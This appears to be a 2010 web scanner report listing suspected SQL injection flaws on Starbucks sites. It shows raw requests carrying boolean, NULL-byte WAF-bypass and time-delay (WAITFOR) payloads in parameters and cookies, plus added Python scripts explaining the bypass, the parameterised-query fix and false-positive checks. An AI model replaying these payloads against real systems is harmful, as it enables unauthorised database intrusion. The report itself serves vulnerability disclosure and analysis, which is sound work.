                       <a href="/coffee/via/instant-coffee/iced-coffee" title="Iced">
                           <img src="http://assets.starbucks.com/assets/c0b5db9b45aa40c8802e6ef8cab1a455.jpg" alt="Starbucks VIA.. Italian Roast stamp" />
                           <br /><strong><span>Iced</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity"></span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/italian-roast" title="Italian Roast">
                           <img src="http://assets.starbucks.com/assets/68df7c127cf54ae78b4c40245fe8d7e4.png" alt="Starbucks VIA.. Italian Roast stamp" />
                           <br /><strong><span>Italian Roast</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity">Extra Bold</span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/decaf-italian-roast" title="Decaf Italian Roast">
                           <img src="http://assets.starbucks.com/assets/fe84dd520a6145e0a7a83ab844737097.png" alt="Information about Starbucks VIA.. Dec
...[SNIP]...

Request 2

GET /coffee/via/instant-coffee?113312046'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:02 GMT
Connection: close
Content-Length: 53065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="/coffee/via/instant-coffee/colombia" title="Colombia">
                           <img src="http://assets.starbucks.com/assets/b5deaf4ecf7d425e822f907973cb950f.png" alt="Starbucks VIA.. Colombia" />
                           <br /><strong><span>Colombia</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity">Medium</span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/iced-coffee" title="Iced">
                           <img src="http://assets.starbucks.com/assets/c0b5db9b45aa40c8802e6ef8cab1a455.jpg" alt="Starbucks VIA.. Italian Roast stamp" />
                           <br /><strong><span>Iced</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity"></span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/italian-roast" title="Italian Roast">
                           <img src="http://assets.starbucks.com/assets/68df7c127cf54ae78b4c40245fe8d7e4.png" alt="Starbucks VIA.. Italian Roast stamp" />
                           <br /><strong><span>Italian Roast</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity">Extra Bold</span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/decaf-italian-roast" title="Decaf Italian Roast">
                           <img src="http://assets.starbucks.com/assets/fe84dd520a6145e0a7a83ab844737097.png" alt="Information about Starbucks VIA.. Decaf Italian Roast" />
                           <br /><strong><span>Decaf Italian Roast</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity"></span>
                       </a>
                   </li>
                   
               </ol>
       </div>
       

       <div class="section" id="posts">


<div id="blog-602" class="blog-entry">
<h2><a href="/blog/Perfect-your-Starbucks-VIA-Ready-Brew-Flavored-experience">Perfect Your Starbucks VI
...[SNIP]...

1.3. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucks.com
Path:   /menu

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /menu?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:38:03 GMT
Connection: close
Content-Length: 72340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="/menu/drinks/chocolate/peppermint-mocha-hot-chocolate">Peppermint Mocha Hot Chocolate</a></li><li><a href="/menu/drinks/chocolate/salted-caramel-hot-chocolate">Salted Caramel Hot Chocolate</a></li><li><a href="/menu/drinks/chocolate/white-hot-chocolate">White Hot Chocolate</a></li></ol></li><li><a href="/menu/drinks/espresso">Espresso Beverages</a><ol><li><a href="/menu/drinks/espresso/caffe-americano">Caff&#232; Americano</a></li><li><a href="/menu/drinks/espresso/caffe-latte">Caff&#232; Latte</a></li><li><a href="/menu/drinks/espresso/caffe-mocha">Caff&#232; Mocha</a></li><li><a href="/menu/drinks/espresso/cappuccino">Cappuccino</a></li><li><a href="/menu/drinks/espresso/caramel-macchiato">Caramel Macchiato</a></li><li><a href="/menu/drinks/espresso/caramel-brulee-latte">Caremel Brul&#233;e Latte</a></li><li><a href="/menu/drinks/espresso/cinnamon-dolce-latte">Cinnamon Dolce Latte</a></li><li><a href="/menu/drinks/espresso/eggnog-latte">Eggnog Latte</a></li><li><a href="/menu/drinks/espresso/espresso-shot">Espresso</a></li><li><a href="/menu/drinks/espresso/espresso-con-panna">Espresso Con Panna</a></li><li><a href="/menu/drinks/espresso/espresso-macchiato">Espresso Macchiato </a></li><li><a href="/menu/drinks/espresso/flavored-latte">Flavored Latte</a></li><li><a href="/menu/drinks/espresso/gingerbread-latte">Gingerbread Latte</a></li><li><a href="/menu/drinks/espresso/iced-caffe-americano">Iced Caff&#232; Americano</a></li><li><a href="/menu/drinks/espresso/iced-caffe-latte">Iced Caff&#232; Latte</a></li><li><a href="/menu/drinks/espresso/iced-caffe-mocha">Iced Caff&#232; Mocha</a></li><li><a href="/menu/drinks/espresso/iced-caramel-macchiato">Iced Caramel Macchiato</a></li><li><a href="/menu/drinks/espresso/iced-cinnamon-dolce-latte">Iced Cinnamon Dolce Latte</a></li><li><a href="/menu/drinks/espresso/iced-flavored-latte">Iced Flavored Latte</a></li><li><a href="/menu/drinks/espresso/iced-gingerbread-latte">Iced Gingerbread Latte</a></li><li><a 
href="/men
...[SNIP]...

Request 2

GET /menu?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:38:04 GMT
Connection: close
Content-Length: 72143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="/menu/drinks/chocolate/salted-caramel-hot-chocolate">Salted Caramel Hot Chocolate</a></li><li><a href="/menu/drinks/chocolate/white-hot-chocolate">White Hot Chocolate</a></li></ol></li><li><a href="/menu/drinks/espresso">Espresso Beverages</a><ol><li><a href="/menu/drinks/espresso/caffe-americano">Caff&#232; Americano</a></li><li><a href="/menu/drinks/espresso/caffe-latte">Caff&#232; Latte</a></li><li><a href="/menu/drinks/espresso/caffe-mocha">Caff&#232; Mocha</a></li><li><a href="/menu/drinks/espresso/cappuccino">Cappuccino</a></li><li><a href="/menu/drinks/espresso/caramel-macchiato">Caramel Macchiato</a></li><li><a href="/menu/drinks/espresso/caramel-brulee-latte">Caremel Brul&#233;e Latte</a></li><li><a href="/menu/drinks/espresso/cinnamon-dolce-latte">Cinnamon Dolce Latte</a></li><li><a href="/menu/drinks/espresso/eggnog-latte">Eggnog Latte</a></li><li><a href="/menu/drinks/espresso/espresso-shot">Espresso</a></li><li><a href="/menu/drinks/espresso/espresso-con-panna">Espresso Con Panna</a></li><li><a href="/menu/drinks/espresso/espresso-macchiato">Espresso Macchiato </a></li><li><a href="/menu/drinks/espresso/flavored-latte">Flavored Latte</a></li><li><a href="/menu/drinks/espresso/gingerbread-latte">Gingerbread Latte</a></li><li><a href="/menu/drinks/espresso/iced-caffe-americano">Iced Caff&#232; Americano</a></li><li><a href="/menu/drinks/espresso/iced-caffe-latte">Iced Caff&#232; Latte</a></li><li><a href="/menu/drinks/espresso/iced-caffe-mocha">Iced Caff&#232; Mocha</a></li><li><a href="/menu/drinks/espresso/iced-caramel-macchiato">Iced Caramel Macchiato</a></li><li><a href="/menu/drinks/espresso/iced-cinnamon-dolce-latte">Iced Cinnamon Dolce Latte</a></li><li><a href="/menu/drinks/espresso/iced-flavored-latte">Iced Flavored Latte</a></li><li><a href="/menu/drinks/espresso/iced-peppermint-mocha">Iced Peppermint Mocha</a></li><li><a href="/menu/drinks/espresso/iced-peppermint-white-chocolate-mocha">Iced Peppermint White Chocolate 
Mocha</a></li><li><a
...[SNIP]...

1.4. http://www.starbucks.com/responsibility [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucks.com
Path:   /responsibility

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
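The mechanism behind the two paragraphs above, as an added illustration that is not part of the scanner output and models no particular WAF product or any Starbucks code: the filter and the application see two different strings. A filter written in native code handles the decoded cookie as a NUL-terminated string, so a %00 hides everything after it from the check; the managed application keeps the whole value and pastes it into the statement. The single-quote / double-quote probe used here and in 1.6 works because '' inside a string literal is an escaped quote, so one quote leaves the literal unterminated (the 302 to /error/ in Request 1) while two quotes do not (the 200 in Request 2). The visitors table and utmc column below are invented for the example; the report does not show the real query.

```python
"""
Why a NUL byte gets a quote past a native-code filter, and why the
single-quote / double-quote probe works (findings 1.4 and 1.6).

Added example; not part of the Burp output and not a model of any specific
WAF or of the Starbucks code. The filter handles the decoded cookie as a
C string, the application as a length-counted managed string, and the
"database" only checks whether the statement ends inside an unterminated
string literal, the condition behind the error page the report shows.
"""
from urllib.parse import unquote


def unterminated_literal(sql: str) -> bool:
    """True if the statement ends inside a single-quoted literal.
    Inside a literal, '' is an escaped quote, not a terminator; that is why
    two quotes leave the statement well formed while one breaks it."""
    inside = False
    i = 0
    while i < len(sql):
        if sql[i] == "'":
            if inside and sql[i + 1:i + 2] == "'":
                i += 2          # escaped quote, still inside the literal
                continue
            inside = not inside
        i += 1
    return inside


def native_filter_view(raw_cookie: str) -> str:
    """A filter written in C sees a NUL-terminated string: everything after
    the first %00 is invisible to it."""
    return unquote(raw_cookie).split("\x00", 1)[0]


def filter_allows(raw_cookie: str) -> bool:
    """The blocklist the report infers: reject values containing a quote."""
    return "'" not in native_filter_view(raw_cookie)


def app_view(raw_cookie: str) -> str:
    """The managed application keeps the whole value, NUL included."""
    return unquote(raw_cookie)


def vulnerable_lookup(raw_cookie: str) -> str:
    """The defect: the cookie is pasted into the statement text.
    Table and column names are invented for the example."""
    sql = "SELECT hits FROM visitors WHERE utmc = '%s'" % app_view(raw_cookie)
    return "302 /error/" if unterminated_literal(sql) else "200 OK"


def probe(raw_cookie: str) -> str:
    """What the scanner sees for one request through filter and app."""
    if not filter_allows(raw_cookie):
        return "blocked"
    return vulnerable_lookup(raw_cookie)


def safe_lookup(raw_cookie: str):
    """The fix: the value travels as a bound parameter, never as SQL text,
    so no byte in it can change the statement's structure."""
    return "SELECT hits FROM visitors WHERE utmc = ?", (app_view(raw_cookie),)


if __name__ == "__main__":
    for cookie in ("246673883'", "246673883%00'", "246673883%00''"):
        print("%-18r filter sees %-12r app sees %-18r -> %s"
              % (cookie, native_filter_view(cookie), app_view(cookie), probe(cookie)))
```

The three cookie values in the demo are the ones the report sent: the plain quote is blocked, the quote behind a NUL reaches the query and breaks it, and the doubled quote behind a NUL reaches the query and is accepted as an escaped quote. The fix is the parameterised statement, not a better blocklist.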

Request 1

GET /responsibility HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883%00'; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 1

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /error/
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:14:43 GMT
Connection: close
Content-Length: 128

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ferror%2f">here</a>.</h2>
</body></html>

Request 2

GET /responsibility HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883%00''; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:15:59 GMT
Connection: close
Content-Length: 56642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...

1.5. http://www.starbucks.com/responsibility/community/starbucks-foundation [__utmc cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-foundation

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmc cookie. The application took 51339 milliseconds to respond to the request, compared with 260 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server: WAITFOR DELAY is Transact-SQL syntax, and '0:0:20' is the hh:mm:ss time literal it accepts.
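One observation a reviewer should not skip: the injected delay was 20 seconds, but the response took about 51 seconds, roughly two and a half times that. That is consistent with the cookie value reaching more than one query (or the same query running more than once) per request, though the report does not establish which, and a single sample cannot separate a genuine WAITFOR from a server that was simply slow at that moment. The Python script below, added here and not part of the scanner output, is the confirmation step a practitioner would run: send several requests with different requested delays and check that the extra response time scales with the delay; the slope also estimates how many times the statement runs per request. It keeps individual delays short, since a 51-second request already ties up an application worker for that long. The two targets are constructed and return canned timings, so nothing actually sleeps; the assumption that the vulnerable target runs the statement twice per request is for illustration only.

```python
"""
Confirming a time-based SQL injection result without trusting one sample.

Added example for finding 1.5; not part of the Burp output. `send` stands in
for your HTTP client: send(delay) issues the request with the cookie set to
...')waitfor delay'0:0:<delay>'--  (delay 0 means the unmodified request)
and returns the elapsed wall-clock seconds. The two targets at the bottom
return canned timings, so nothing here really sleeps.
"""
import statistics


def confirm_time_based(send, delays=(5, 10, 20), baseline_runs=3, min_ratio=0.9):
    """Return (confirmed, details).

    Rather than one long request, issue several shorter ones with different
    requested delays and check that the extra response time grows with the
    delay. A server that is merely slow adds the same latency to every
    request (slope about 0); a genuine WAITFOR adds about delay * k seconds,
    where k is how many times the injected statement runs per request.
    """
    baseline = statistics.median(send(0) for _ in range(baseline_runs))
    extra = [send(d) - baseline for d in delays]
    n = len(delays)
    mean_d = sum(delays) / n
    mean_e = sum(extra) / n
    # least-squares slope of extra time against requested delay
    slope = (sum((d - mean_d) * (e - mean_e) for d, e in zip(delays, extra))
             / sum((d - mean_d) ** 2 for d in delays))
    # every requested delay must actually have materialised, not just the trend
    materialised = all(e >= min_ratio * d for d, e in zip(delays, extra))
    confirmed = materialised and slope >= min_ratio
    return confirmed, {"baseline": baseline, "extra": extra, "slope": slope,
                       "runs_per_request": round(slope)}


# ---- constructed targets (canned timings, no sleeping) -----------------------
def vulnerable_target(delay: float) -> float:
    """Baseline 0.26 s as in the report; the injected statement is assumed to
    run twice per request (an illustration, not something the report
    establishes), so each requested second costs two."""
    return 0.26 + 2 * delay


def slow_target(delay: float) -> float:
    """An overloaded backend: 30 s for every request, delay or not."""
    return 30.0


if __name__ == "__main__":
    print("vulnerable:", confirm_time_based(vulnerable_target))
    print("just slow: ", confirm_time_based(slow_target))
```

Against a real target, pass a function that times the actual request; keep the delays at a few seconds each and raise them only if the baseline is noisy, and run the check outside peak hours on production systems.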

Request

GET /responsibility/community/starbucks-foundation HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883')waitfor%20delay'0%3a0%3a20'--; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:42:07 GMT
Connection: close
Content-Length: 39480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...

1.6. http://www.starbucksstore.com/aff/adredir.asp [SITESERVER cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /aff/adredir.asp

Issue detail

The SITESERVER cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SITESERVER cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C'; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:25 GMT
Connection: close
Content-Length: 75

The page cannot be displayed because an internal server error has occurred.

Request 2

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C''; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 2

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 168
Content-Type: text/html
Location: /coffee/?CCAID=SBPTPAHP1SHCO&Redir=/coffee/
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHCO; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:26 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/coffee/?CCAID=SBPTPAHP1SHCO&amp;Redir=/coffee/">here</a>.</body>

1.7. http://www.starbucksstore.com/guestassist/shcontus.asp [ASPSESSIONIDACABBACA cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /guestassist/shcontus.asp

Issue detail

The ASPSESSIONIDACABBACA cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the ASPSESSIONIDACABBACA cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
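The note above applies equally to 1.2, 1.3 and this finding, and the captured evidence gives reason to take it seriously. Here both responses are exactly 20694 bytes and the only visible difference is the fresh ASPSESSIONID issued by Set-Cookie, consistent with classic ASP starting a new session when the presented session cookie is not one it recognises; in 1.2 the two bodies differ by 455 bytes and the visible content is product and blog listings, which are the kind of content that changes on its own. The Python script below, added here and not part of the scanner output, is the manual re-check a reviewer would run: it measures how much the page varies with no payload at all, strips volatile tokens such as session cookies, and only then compares the true and false responses. Its two targets are constructed stand-ins, one backed by an in-memory SQLite table with a real concatenation bug and one that changes on every request without reading the parameter; the coffee category, product names and blog titles in it are illustrative.

```python
"""
Re-checking a difference-based (boolean) SQL injection result offline.

Added example for findings 1.2, 1.3 and 1.7; not part of the Burp output and
a model of no real Starbucks code. Two constructed targets stand in for the
web application: one really concatenates the parameter into a query (backed
by an in-memory SQLite table), the other ignores the parameter but rotates a
blog teaser and issues a fresh session cookie on every request, which is
enough to make a byte-level comparison say "different".
"""
import itertools
import re
import sqlite3
from difflib import SequenceMatcher

# Tokens that change on every request regardless of input. Extend for the
# target at hand (CSRF nonces, timestamps in the body, analytics ids, ...).
VOLATILE = [
    re.compile(r"ASPSESSIONID[A-Z]+=[A-Za-z0-9]+"),   # classic ASP session cookie
    re.compile(r"ASP\.NET_SessionId=[0-9a-z]+"),
    re.compile(r"^Date: .*$", re.M),
]


def normalise(response: str) -> str:
    for pat in VOLATILE:
        response = pat.sub("", response)
    return response


def sim(a: str, b: str) -> float:
    """Similarity (0..1) of two responses after volatile tokens are removed."""
    return SequenceMatcher(None, normalise(a), normalise(b), autojunk=False).ratio()


def raw_differs(fetch, true_value: str, false_value: str) -> bool:
    """The naive test: did any byte change between the two responses?"""
    return fetch(true_value) != fetch(false_value)


def boolean_sqli_check(fetch, true_value, false_value, benign="coffee", samples=3, margin=0.02):
    """fetch(value) -> full HTTP response text with the parameter set to value.

    1. Fetch a benign value several times to measure how much the page
       varies on its own (the noise floor).
    2. Flag only if the TRUE and FALSE responses differ by more than that
       noise AND one of them still looks like the unmodified page. The
       second condition separates "the predicate changed the result set"
       from "the page is different every time anyway".
    """
    baseline = [fetch(benign) for _ in range(samples)]
    noise = min(sim(x, y) for x, y in itertools.permutations(baseline, 2))
    t_resp, f_resp = fetch(true_value), fetch(false_value)
    pair = sim(t_resp, f_resp)
    closest = max(sim(t_resp, baseline[0]), sim(f_resp, baseline[0]))
    flagged = pair < noise - margin and closest >= noise - margin
    return flagged, {"noise": noise, "pair": pair, "closest": closest}


# ---- constructed targets ---------------------------------------------------
_session = itertools.count(1000)


def _page(body: str) -> str:
    return ("HTTP/1.1 200 OK\r\nSet-Cookie: ASPSESSIONIDACABBACA=S%d; path=/\r\n\r\n"
            "<html><body>%s</body></html>" % (next(_session), body))


_db = sqlite3.connect(":memory:")
_db.executescript("""
    CREATE TABLE products(name TEXT, category TEXT);
    INSERT INTO products VALUES
      ('Christmas Blend','coffee'), ('Colombia','coffee'), ('Iced','coffee'),
      ('Italian Roast','coffee'), ('Decaf Italian Roast','coffee'),
      ('Earl Grey','tea'), ('Chai','tea');
""")


def vulnerable_app(value: str) -> str:
    """The parameter is concatenated into the WHERE clause (the defect)."""
    sql = "SELECT name FROM products WHERE category = '%s'" % value
    try:
        rows = _db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return _page("<h1>Error</h1><p>%s</p>" % exc)
    items = "".join('<li><a href="/coffee/%s">%s</a></li>'
                    % (name.lower().replace(" ", "-"), name) for (name,) in rows)
    return _page("<ol>%s</ol>" % items)


_posts = itertools.cycle([
    '<div id="blog-603"><h2>The New Starbucks Reserve Coffees</h2></div>',
    '<div id="blog-602"><h2>Perfect Your Starbucks VIA Ready Brew experience</h2></div>',
])


def rotating_app(value: str) -> str:
    """Ignores the parameter entirely, yet no two responses are identical."""
    return _page("<ol><li>Colombia</li><li>Italian Roast</li></ol>" + next(_posts))


if __name__ == "__main__":
    pair = ("coffee' and 1=1-- ", "coffee' and 1=2-- ")
    for app in (vulnerable_app, rotating_app):
        print(app.__name__, "raw differs:", raw_differs(app, *pair),
              "verdict:", boolean_sqli_check(app, *pair))
```

Both targets make the naive byte comparison report a difference; only the one with the real concatenation bug survives the noise-floor check. The same function handles the or 1=1 / or 1=2 pair from 1.2, where it is the false branch rather than the true one that matches the unmodified page.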

Request 1

GET /guestassist/shcontus.asp?error=noselection HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp?error=noselection
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK'%20and%201%3d1--%20; ASPSESSIONIDACACCDBA=LNFLDLCBOHDNPNFKEGCPKHPK; ASPSESSIONIDCABCBCAB=JKFLDLCBMLMOMLJLKGKMLOEI

Response 1

